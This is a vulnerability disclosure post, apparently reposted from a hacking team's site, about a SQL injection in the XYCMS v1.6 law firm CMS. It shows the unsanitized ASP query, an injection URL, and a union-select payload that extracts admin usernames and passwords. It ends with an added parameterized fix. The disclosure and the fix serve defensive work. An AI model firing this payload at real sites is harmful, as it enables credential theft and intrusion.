Author: Liuker, www.anying.org (The Shadow Technical Team). Reprints must indicate the website and author.
Just now, I was bored and downloaded this to audit, but I have read a little bit of it. There are too many vulnerabilities. PS: it is a bit similar to a forum article with a contribution.
------------------------------------------------------
Audit version: XYCMS law firm site building system v1.6 (test other versions yourself)
Source code address: http://down.chinaz.com/soft/29233.htm
Vulnerable file: shownews.asp
Vulnerable code: lines 7-13
<%
' id comes straight from the query string and is concatenated into the SQL text
id = request.QueryString("id")
set snews = server.CreateObject("adodb.recordset")
exec = "select * from [news] where id = " & id
snews.open exec, conn, 1, 1
%>
The id parameter is not filtered at all, which directly creates an injection point: http://127.0.0.1:99/shownews.asp?id=xx
Other files with the same vulnerability: showdxal.asp, showfwly.asp, etc.
Exp: union select 1,admin,password,7 from admin_user
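A hardened form of the shownews.asp query above, as an added example that is not part of the original post or of the XYCMS code base. It assumes `conn` is the already-open ADODB connection used by the original snippet and that `[news].id` is an integer column (the schema is not shown on the page); the same change applies to showdxal.asp and showfwly.asp.

```asp
<%
' Added example: parameterized replacement for the vulnerable query.
' Assumptions: conn is the open ADODB.Connection from the site's include file,
' and [news].id is an integer column.
Const adInteger = 3      ' ADO DataTypeEnum
Const adParamInput = 1   ' ADO ParameterDirectionEnum
Const adCmdText = 1      ' ADO CommandTypeEnum

Dim id, re, cmd, snews
id = Trim(Request.QueryString("id"))

' Allow-list: digits only. IsNumeric() alone is too loose (it accepts
' forms such as "1e5"), and a repeated ?id= arrives as "1, 2".
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(id) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

' Bind the value as a typed parameter so it is never parsed as SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "select * from [news] where id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , CLng(id))

' Same cursor and lock type (1, 1) as the original snews.open call.
Set snews = Server.CreateObject("ADODB.Recordset")
snews.Open cmd, , 1, 1
If snews.EOF Then
    Response.Status = "404 Not Found"
    Response.End
End If
%>
```

With the parameter bound as an integer, a request carrying the `union select` string from the post is rejected by the digit check before any SQL is built.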